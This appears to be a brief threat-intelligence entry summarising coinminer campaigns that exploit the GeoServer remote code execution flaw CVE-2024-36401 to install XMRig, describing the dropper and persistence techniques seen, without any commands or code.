GeoServer RCE Exploited in CoinMiner Campaigns (Campaign)

Researchers observed active exploitation of GeoServer remote code execution (CVE-2024-36401) in multiple coinminer campaigns that download and install XMRig using PowerShell, Bash, and certutil-based droppers. Three campaign types were identified: simple script-based deployments, certutil + RAR SFX droppers installing a disguised XMRig as a Windows service via NSSM, and hybrid campaigns that add remote-access tooling and attempts to disable Windows Defender for persistence.